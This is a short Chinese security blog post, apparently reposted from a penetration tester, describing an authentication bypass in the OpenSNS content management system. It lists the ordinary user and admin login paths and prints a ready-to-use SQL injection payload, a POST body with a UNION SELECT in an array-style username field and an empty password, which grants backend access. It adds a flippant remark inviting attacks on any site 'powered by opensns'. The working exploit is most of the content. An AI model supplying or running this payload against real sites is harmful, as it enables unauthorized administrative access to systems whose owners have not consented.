opensns秒进后台

JAVASEC 2019年11月20日23:28:35评论584 views字数 264阅读0分52秒阅读模式
摘要

这个是在给客户做渗透测试的时候发现的。期间感谢雨神powered by opensns 随便日

这个是在给客户做渗透测试的时候发现的。期间感谢雨神

powered by opensns 随便日

秒进后台有2处地方:

一个是普通用户登录,一处后台管理登录(默认)

http://a.com/index.php?s=/ucenter/member/login.html 普通用户登录

http://a.com/index.php?s=/admin/public/login.html 后台登录

playload: POST

username[0]==1 UNION SELECT 1,2,'',4,5,6,7,8,9,10,11,12#IN&password= 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
JAVASEC
  • 本文由 发表于 2019年11月20日23:28:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   opensns秒进后台https://cn-sec.com/archives/70640.html

发表评论

匿名网友 填写信息